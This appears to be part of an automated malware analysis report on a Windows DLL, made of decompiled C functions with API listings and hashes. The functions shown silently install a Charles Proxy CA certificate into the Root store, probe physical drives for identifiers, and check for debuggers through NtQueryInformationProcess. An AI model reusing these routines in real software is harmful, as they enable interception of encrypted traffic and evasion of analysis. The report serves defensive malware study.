                                                                                                                                                                  				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT
/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
                                                                                                                                                                  					_t66 = L1000CEAF(__ebx, _v12, __edi, __esi, _v12);
                                                                                                                                                                  					_t122 = _t121 + 4;
                                                                                                                                                                  					_v20 = _t66;
                                                                                                                                                                  					_t133 = _v20;
                                                                                                                                                                  					if(_v20 != 0) {
                                                                                                                                                                  						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
                                                                                                                                                                  						_t69 = _v12;
                                                                                                                                                                  						__imp__CertCreateCertificateContext(1, _v20, _t69); // executed
                                                                                                                                                                  						_v8 = _t69;
                                                                                                                                                                  						_push(_v20);
                                                                                                                                                                  						_t70 = E1000CA40(__ebx, __edi, __esi, _t133);
                                                                                                                                                                  						_t123 = _t122 + 4;
                                                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                                                  							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root"); // executed
                                                                                                                                                                  							_v28 = _t70;
                                                                                                                                                                  							if(_v28 != 0) {
                                                                                                                                                                  								_t71 = _v8;
                                                                                                                                                                  								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0); // executed
                                                                                                                                                                  								if(_t71 == 0) {
                                                                                                                                                                  									_t72 = GetLastError();
                                                                                                                                                                  									__eflags = _t72 - 0x80092005;
                                                                                                                                                                  									if(_t72 == 0x80092005) {
                                                                                                                                                                  										_v36 = 0;
                                                                                                                                                                  										_v32 = 0;
                                                                                                                                                                  										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
                                                                                                                                                                  										__eflags = _v36;
                                                                                                                                                                  										if(_v36 > 0) {
                                                                                                                                                                  											_t75 = L1000CEAF(__ebx,  &_v36, __edi, __esi, _v36 + 1);
                                                                                                                                                                  											_t124 = _t123 + 4;
                                                                                                                                                                  											_v32 = _t75;
                                                                                                                                                                  											__eflags = _v32;
                                                                                                                                                                  											if(_v32 != 0) {
                                                                                                                                                                  												E1000CF80(_t118, _v32, 0, _v36 + 1);
                                                                                                                                                                  												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
                                                                                                                                                                  												_v564 = 0;
                                                                                                                                                                  												E1000CF80(_t118,  &_v563, 0, 0x103);
                                                                                                                                                                  												_v300 = 0;
                                                                                                                                                                  												E1000CF80(_t118,  &_v299, 0, 0x103);
                                                                                                                                                                  												_t127 = _t124 + 0x24;
                                                                                                                                                                  												_v568 = 0;
                                                                                                                                                                  												while(1) {
                                                                                                                                                                  													__eflags = _v568 - _v36;
                                                                                                                                                                  													if(_v568 >= _v36) {
                                                                                                                                                                  														break;
                                                                                                                                                                  													}
                                                                                                                                                                  													E1000CCA3(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
                                                                                                                                                                  													_t127 = _t127 + 0xc;
                                                                                                                                                                  													_t90 = _v568 + 1;
                                                                                                                                                                  													__eflags = _t90;
                                                                                                                                                                  													_v568 = _t90;
                                                                                                                                                                  												}
                                                                                                                                                                  												E1000CCA3(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
                                                                                                                                                                  												_v24 = E1001F6E0(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
                                                                                                                                                                  												_push(_v32);
                                                                                                                                                                  												E1000CA40(_t91, _t118, _t119, __eflags);
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_v24 = 1;
                                                                                                                                                                  								}
                                                                                                                                                                  								__imp__CertCloseStore(_v28, 1);
                                                                                                                                                                  							}
                                                                                                                                                                  							__imp__CertFreeCertificateContext(_v8);
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v24;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
                                                                                                                                                                  • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
                                                                                                                                                                  • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 1001F877
                                                                                                                                                                  • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F8A2
                                                                                                                                                                  • _memset.LIBCMT ref: 1001F8DB
                                                                                                                                                                  • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F8F1
                                                                                                                                                                  • _memset.LIBCMT ref: 1001F90C
                                                                                                                                                                  • _memset.LIBCMT ref: 1001F929
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001F97C
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001F999
                                                                                                                                                                  • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                                  • API String ID: 3311258246-1857994723
                                                                                                                                                                  • Opcode ID: 1e4d97f329b5e1f4bc93b0763e4fcb6cb0116e427961557286b91f0a253fefe1
                                                                                                                                                                  • Instruction ID: 735c7eb008ba94e8865f05c141388d8d9a48af4fd13d1d85c3f126029706ba6d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e4d97f329b5e1f4bc93b0763e4fcb6cb0116e427961557286b91f0a253fefe1
                                                                                                                                                                  • Instruction Fuzzy Hash: B76133B5D00219AFEB10DF90CC99FFEB7B4EB48704F104598E605AB181D7B5AA85CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E1001D840(void* __edi, intOrPtr _a4) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				void* _v28;
                                                                                                                                                                  				void* _v32;
                                                                                                                                                                  				void* _v36;
                                                                                                                                                                  				void* _v40;
                                                                                                                                                                  				signed short* _v44;
                                                                                                                                                                  				void* _v48;
                                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                                  				signed int* _v60;
                                                                                                                                                                  				char _v570;
                                                                                                                                                                  				short _v572;
                                                                                                                                                                  				char _v1596;
                                                                                                                                                                  				void* _v1600;
                                                                                                                                                                  				char _v1604;
                                                                                                                                                                  				long _v1608;
                                                                                                                                                                  				signed int _v1612;
                                                                                                                                                                  				void* _v1616;
                                                                                                                                                                  				void* _v1620;
                                                                                                                                                                  				void* _v1624;
                                                                                                                                                                  				void* _v1628;
                                                                                                                                                                  				void* _v1632;
                                                                                                                                                                  				signed int _v1633;
                                                                                                                                                                  				void _v1636;
                                                                                                                                                                  				char _v2148;
                                                                                                                                                                  				char _v2164;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  				int _t78;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  				void* _t123;
                                                                                                                                                                  				void* _t124;
                                                                                                                                                                  
                                                                                                                                                                  				_t123 = __edi;
                                                                                                                                                                  				_v52 = _a4;
                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                  					L18:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v1600 = 0;
                                                                                                                                                                  				_v1612 = 0;
                                                                                                                                                                  				while(1 != 0) {
                                                                                                                                                                  					_v572 = 0;
                                                                                                                                                                  					E1000CF80(_t123,  &_v570, 0, 0x1fe);
                                                                                                                                                                  					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
                                                                                                                                                                  					_t124 = _t124 + 0x18;
                                                                                                                                                                  					_t73 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                                  					_v48 = _t73;
                                                                                                                                                                  					if(_v48 == 0xffffffff) {
                                                                                                                                                                  						L15:
                                                                                                                                                                  						_v1612 = 1 + _v1612;
                                                                                                                                                                  						if(_v1612 < 4) {
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						return _v1600;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v1608 = 0;
                                                                                                                                                                  					_v1636 = 0;
                                                                                                                                                                  					_v1632 = 0;
                                                                                                                                                                  					_v1628 = 0;
                                                                                                                                                                  					_v1624 = 0;
                                                                                                                                                                  					_v1620 = 0;
                                                                                                                                                                  					_v1616 = 0;
                                                                                                                                                                  					_t78 = DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0); // executed
                                                                                                                                                                  					if(_t78 == 0) {
                                                                                                                                                                  						CloseHandle(_v48);
                                                                                                                                                                  						goto L15;
                                                                                                                                                                  					}
                                                                                                                                                                  					if((_v1633 & 0x000000ff) == 0) {
                                                                                                                                                                  						L11:
                                                                                                                                                                  						CloseHandle(_v48);
                                                                                                                                                                  						if(_v1600 == 0) {
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						}
                                                                                                                                                                  						return _v1600;
                                                                                                                                                                  					}
                                                                                                                                                                  					asm("sbb edx, edx");
                                                                                                                                                                  					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
                                                                                                                                                                  					_v40 = 0;
                                                                                                                                                                  					_v36 = 0;
                                                                                                                                                                  					_v32 = 0;
                                                                                                                                                                  					_v28 = 0;
                                                                                                                                                                  					_v24 = 0;
                                                                                                                                                                  					_v20 = 0;
                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                  					E1000CF80(_t123,  &_v2164, 0, 0x210);
                                                                                                                                                                  					_t88 = E1001CF80( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
                                                                                                                                                                  					_t124 = _t124 + 0x24;
                                                                                                                                                                  					if(_t88 == 0) {
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v60 =  &_v1596;
                                                                                                                                                                  					_v44 =  &_v2148;
                                                                                                                                                                  					do {
                                                                                                                                                                  						 *_v60 =  *_v44 & 0x0000ffff;
                                                                                                                                                                  						_v44 =  &(_v44[1]);
                                                                                                                                                                  						_v60 =  &(_v60[1]);
                                                                                                                                                                  					} while (_v44 <  &_v1636);
                                                                                                                                                                  					_v56 = E1001CDD0( &_v1596);
                                                                                                                                                                  					_t94 = E1001D000(_v56, 0x104, _v52);
                                                                                                                                                                  					_t124 = _t124 + 0x10;
                                                                                                                                                                  					if(_t94 == 0) {
                                                                                                                                                                  						_v1600 = 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L11;
                                                                                                                                                                  				}
                                                                                                                                                                  				goto L18;
                                                                                                                                                                  			}
                                                                                                                                                                  0x1001d9a1
                                                                                                                                                                  0x1001d9a8
                                                                                                                                                                  0x1001d9af
                                                                                                                                                                  0x1001d9b6
                                                                                                                                                                  0x1001d9bd
                                                                                                                                                                  0x1001d9cf
                                                                                                                                                                  0x1001d9fb
                                                                                                                                                                  0x1001da00
                                                                                                                                                                  0x1001da05
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da0d
                                                                                                                                                                  0x1001da16
                                                                                                                                                                  0x1001da19
                                                                                                                                                                  0x1001da22
                                                                                                                                                                  0x1001da2a
                                                                                                                                                                  0x1001da33
                                                                                                                                                                  0x1001da3c
                                                                                                                                                                  0x1001da50
                                                                                                                                                                  0x1001da60
                                                                                                                                                                  0x1001da65
                                                                                                                                                                  0x1001da6a
                                                                                                                                                                  0x1001da6c
                                                                                                                                                                  0x1001da6c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da6a
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D891
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D8AC
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D8CB
                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000000FF,00074080,00000000,00000000,00000000,00000018,00000000,00000000), ref: 1001D943
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D9CF
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DA7A
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DA97
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 381188756-2935326385
                                                                                                                                                                  • Opcode ID: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
                                                                                                                                                                  • Instruction ID: 9769834fe5c7fcaed127812980974d4bd2fdd9b920265f280a0c2248b2b16186
                                                                                                                                                                  • Opcode Fuzzy Hash: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
                                                                                                                                                                  • Instruction Fuzzy Hash: EA615EB0D042189BEB20DF94CC95BDDB7B6EF84314F148199E5097B280DB76AAD8CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E1001DAD0(void* __edi, intOrPtr _a4) {
                                                                                                                                                                  				struct _OVERLAPPED* _v8;
                                                                                                                                                                  				struct _OVERLAPPED* _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				short _v532;
                                                                                                                                                                  				struct _OVERLAPPED* _v536;
                                                                                                                                                                  				struct _OVERLAPPED* _v540;
                                                                                                                                                                  				void _v544;
                                                                                                                                                                  				long _v548;
                                                                                                                                                                  				struct _OVERLAPPED* _v552;
                                                                                                                                                                  				intOrPtr _v10532;
                                                                                                                                                                  				void _v10556;
                                                                                                                                                                  				char _v11556;
                                                                                                                                                                  				void* _t43;
                                                                                                                                                                  				int _t48;
                                                                                                                                                                  				void* _t56;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  
                                                                                                                                                                  				_t70 = __edi;
                                                                                                                                                                  				E10018B00(0x2d20);
                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                  					L13:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v552 = 0;
                                                                                                                                                                  				while(1 != 0) {
                                                                                                                                                                  					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
                                                                                                                                                                  					_t71 = _t71 + 0xc;
                                                                                                                                                                  					_t43 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0); // executed
                                                                                                                                                                  					_v16 = _t43;
                                                                                                                                                                  					if(_v16 == 0xffffffff) {
                                                                                                                                                                  						L10:
                                                                                                                                                                  						_v8 =  &(_v8->Internal);
                                                                                                                                                                  						_v552 = _v8;
                                                                                                                                                                  						if(_v8 < 4) {
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						return _v12;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v548 = 0;
                                                                                                                                                                  					_v536 = 0;
                                                                                                                                                                  					_v544 = 0;
                                                                                                                                                                  					_v540 = 0;
                                                                                                                                                                  					E1000CF80(_t70,  &_v10556, 0, 0x2710);
                                                                                                                                                                  					_t71 = _t71 + 0xc;
                                                                                                                                                                  					_t48 = DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0); // executed
                                                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                                                  						E1000CF80(_t70,  &_v11556, 0, 0x3e8);
                                                                                                                                                                  						E1001D0A0(_v10532,  &_v10556,  &_v11556);
                                                                                                                                                                  						_t56 = E1001D000( &_v11556, 0x104, _a4);
                                                                                                                                                                  						_t71 = _t71 + 0x24;
                                                                                                                                                                  						if(_t56 == 0) {
                                                                                                                                                                  							_v12 = 1;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					FindCloseChangeNotification(_v16); // executed
                                                                                                                                                                  					if(_v12 == 0) {
                                                                                                                                                                  						_v8 = _v552;
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						return _v12;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				goto L13;
                                                                                                                                                                  			}


                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001DB1C
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DB81
                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DBB0
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DBC8
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DC14
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotificationwsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 198797371-2935326385
                                                                                                                                                                  • Opcode ID: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
                                                                                                                                                                  • Instruction ID: 915ac6fd4bdffd3e24e0157f7485166cbeb8f51988887240e801f9576dbfd67f
                                                                                                                                                                  • Opcode Fuzzy Hash: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
                                                                                                                                                                  • Instruction Fuzzy Hash: B3413F75E40218EBEB10EB90DC89FDDB7B8EB14704F104599E509AA2C1D7B4ABC8CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A000() {
                                                                                                                                                                  				void _v8;
                                                                                                                                                                  				_Unknown_base(*)()* _v12;
                                                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                  				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                                  				NtQueryInformationProcess(GetCurrentProcess(), 7,  &_v8, 4, 0);
                                                                                                                                                                  				return 0 | _v8 != 0x00000000;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 1001A012
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 1001A024
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 1001A037
                                                                                                                                                                  • NtQueryInformationProcess.NTDLL(00000000), ref: 1001A03E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                  • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                  • API String ID: 3653371871-801751246
                                                                                                                                                                  • Opcode ID: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
                                                                                                                                                                  • Instruction ID: 71e2acb23208394f78a226fd07bfd7a9a839184327190de95aec6d8225f51f41
                                                                                                                                                                  • Opcode Fuzzy Hash: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0A575D44208FFEB10EBE0DD8DB9DBBB8EB04201F614494EA15A6180EA746A49CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019F60() {
                                                                                                                                                                  				void _v8;
                                                                                                                                                                  				_Unknown_base(*)()* _v12;
                                                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = 1;
                                                                                                                                                                  				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                  				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                                  				NtQueryInformationProcess(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
                                                                                                                                                                  				return 0 | _v8 != 0x00000001;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F72
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F84
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F97
                                                                                                                                                                  • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F9E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
